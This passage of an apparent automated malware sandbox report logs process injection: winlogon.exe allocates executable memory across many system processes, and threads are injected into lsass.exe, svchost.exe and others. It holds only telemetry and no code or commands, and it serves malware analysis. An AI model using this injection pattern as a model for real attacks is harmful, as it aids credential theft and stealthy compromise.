        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 20B71940000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\explorer.exe base: 8C80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1C55E370000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 192BE930000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\dasHost.exe base: 12EBA690000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 207A8900000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2E7C2740000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 2393C930000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1A313AC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\smartscreen.exe base: 2D010620000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22F16090000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 17740F80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1555CAF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1EE9B270000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\SystemSettingsBroker.exe base: 198AF3F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 29660B00000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 25549A00000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\ApplicationFrameHost.exe base: 216C6E70000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253DE550000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 261FF3A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1C5D53F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 1A2AB790000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 580000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\conhost.exe base: 20BBD290000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 1245E2D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 210015E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BFC2D40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\dllhost.exe base: 1ACAD650000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 16740980000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\RuntimeBroker.exe base: 202E3B50000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23CC1780000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 253E67B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 26E0D650000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C10000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: E10000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2EB0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2EC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 610000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: E80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2CF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 27E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: E00000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 29A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 8A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 27E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2940000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 3010000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 7C0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2880000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 3070000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2C90000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C50000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 27E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2A50000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: BD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 10D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2C30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2D70000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C70000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1110000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: D20000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2A40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2870000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1030000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C50000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 12E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2660000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: BE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 29B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2F90000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1380000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 15E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 15D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2360000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 21D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 800000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2BA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 800000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: F20000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2CF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2E40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 26B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1320000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1320000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: F70000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2D60000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 1540000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: D90000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: CC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 21F0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C20000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: AD0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2B30000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: BC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 24A0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: C10000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2E20000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 6E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2260000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2EF0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: B80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: AE0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: DC0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 28E0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files (x86)\mrxRZwhIdWrjWKUkmcsbtgEwkNzhPBZjKOkiFxBYxwcXiNYPSl\PilA5xlBc1KiIF.exe base: 2E80000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\cmd.exe base: 1D54F9D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\conhost.exe base: 281B7B90000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 20D204D0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\more.com base: 1F66CF40000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 220C2280000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\wbem\WMIADAP.exe base: 220C22B0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Program Files\Windows Defender\MpCmdRun.exe base: 170A7FA0000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\conhost.exe base: 29E3CD50000 protect: page execute and read and writeJump to behavior
        Source: C:\Windows\System32\winlogon.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1F8811D0000 protect: page execute and read and writeJump to behavior
        Creates a thread in another existing process (thread injection)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread created: C:\Windows\System32\winlogon.exe EIP: CE7B2DF0Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\lsass.exe EIP: B9344048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 3E9B4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\dwm.exe EIP: 2E974048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 8F494048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 9E74048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: BF9D4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: EA674048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 7BD94048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: E684048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 29A34048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: D7294048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 84694048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: FDA64048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 14534048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: D2794048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: E07D4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: B1F34048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 14AC4048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: FE194048Jump to behavior
        Source: C:\Windows\System32\winlogon.exeThread created: C:\Windows\System32\svchost.exe EIP: 5FFB4048Jump to behavior
